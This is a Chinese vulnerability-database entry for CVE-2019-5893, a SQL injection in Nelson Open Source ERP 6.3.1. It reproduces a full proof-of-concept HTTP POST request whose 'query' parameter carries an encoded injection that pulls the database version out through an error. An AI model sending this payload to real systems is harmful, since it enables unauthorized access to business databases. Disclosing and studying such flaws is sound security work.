Nelson Open Source ERP SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1450377 漏洞类型 SQL注入
发布时间 2019-01-11 更新时间 2019-01-11
CVE编号 CVE-2019-5893 CNNVD-ID CNNVD-201901-335
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2019010115
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201901-335
|漏洞详情
Nelson Open Source ERP是一套开源的ERP(企业资源计划)系统。该系统包括订单管理、文件管理、财务管理和库存管理等。 Nelson Open Source ERP 6.3.1版本中的db/utils/query/data.xml页面存在SQL注入漏洞。远程攻击者可借助‘query’参数利用该漏洞执行SQL命令。
|漏洞EXP
#Exploit Title: OpenSource ERP SQL Injection
#Date: 10.01.2019
#Exploit Author: Emre AVANA
#Vendor Homepage: http://www.nelson-it.ch
#Software Link: http://sourceforge.net/projects/opensourceerp/files/Windows/erp_6.3.1.exe/download
#Version: v6.3.1
#Tested on: Windows

# CVE-2019-5893
https://github.com/EmreOvunc/OpenSource-ERP-SQL-Injection
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5893
https://www.emreovunc.com/blog/en/OpenERP-SQL-DBversion.png

# PoC

POST /db/utils/query/data.xml HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36
Accept: */*
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
Origin: http://172.16.118.142:8024
Referer: http://172.16.118.142:8024/
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Cookie: MneHttpSessionId8024=15471285865828
Host: 172.16.118.142:8024
Content-Length: 414
Accept-Encoding: gzip, deflate
Connection: close

sqlend=1&query=%27%7c%7ccast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7c(SELECT+VERSION())%7c%7cchr(95)%7c%7cchr(33)%7c%7cchr(64))+as+numeric)%7c%7c%27&schema=mne_application&table=userpref&cols=startweblet%2cregion%2cmslanguage%2cusername%2cloginname%2cpersonid%2clanguage%2cregionselect%2ctimezone%2ccountrycarcode%2cstylename%2cusername%2cstartwebletname&usernameInput.old=session_user&mneuserloginname=test

|参考资料

来源:github.com

链接:https://github.com/EmreOvunc/OpenSource-ERP-SQL-Injection